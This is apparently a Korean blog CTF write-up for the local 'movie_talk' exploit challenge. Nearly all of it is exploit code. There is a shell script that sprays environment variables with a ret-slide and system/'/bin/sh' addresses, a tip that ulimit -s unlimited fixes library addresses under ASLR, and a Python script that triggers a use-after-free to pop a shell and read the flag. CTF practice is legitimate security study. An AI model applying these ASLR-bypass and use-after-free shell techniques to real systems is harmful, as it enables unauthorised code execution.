해당 바이너리는 로컬환경으로 주어지는 exploit문제입니다. 당시 서버 환경은 ASLR과 NX가 정용되어있는 Ubuntu 13.04버전이었어요!!
로컬에서 ulimit -s unlimited를 입력해주면 라이브러리 주소가 고정되니 참고하시길 !!! ^---^
#!/bin/sh # for RET slide # [ret]*100 [system][system][/bin/sh][/bin/sh] for i in $(seq 1 512); do export a$i="`python -c "print '\x42\x6c\x0b\x40'*100 + '\x10\x8f\x07\x40\x10\x8f\x07\x40' + '\xf4\x74\x17\x40\xf4\x74\x17\x40'"`"; done |
#!/usr/bin/env python
import struct
import os
from subprocess import *
import time
p = lambda x: struct.pack( "<I", x )
system = 0x40078f10
binsh = 0x401774f4
addesp = 0x400b6c41
fname = "./movie_talk"
proc = Popen( fname, stdin=PIPE )
proc.stdin.write( "1\n" ) # add movie
time.sleep(2)
proc.stdin.write( "1\n1\n0\n" )
proc.stdin.write( "1\n" ) # add movie
time.sleep(2)
proc.stdin.write( "2\n2\n0\n" )
cmd = "kill -3 %d" % proc.pid
print cmd
os.popen( cmd )
time.sleep(3)
proc.stdin.write( "1\n" ) # add movie
time.sleep(2)
proc.stdin.write( p( addesp ) + "aaaabbbbccccdddd\n3\n0\n" )
time.sleep(3)
proc.stdin.write( "3\n" ) # trigger, UAF
proc.stdin.write( "cat flag.txt\n" )
print proc.stdout
time.sleep(5)'Security > [게임] CTF 풀이' 카테고리의 다른 글
| [misc] 홀리쉴드 2014 magiceye writeup (0) | 2014.11.25 |
|---|---|
| [exploit] 홀리쉴드 2014 kitty writeups (1) | 2014.11.25 |
| [exploit] 2013 SECUINSIDE reader writeups (0) | 2014.11.17 |
| [algorithm] DEFCON 22th 3dttt writeups (0) | 2014.05.22 |
| [exploit] DEFCON 22 babyfirst-heap writeups (0) | 2014.05.20 |
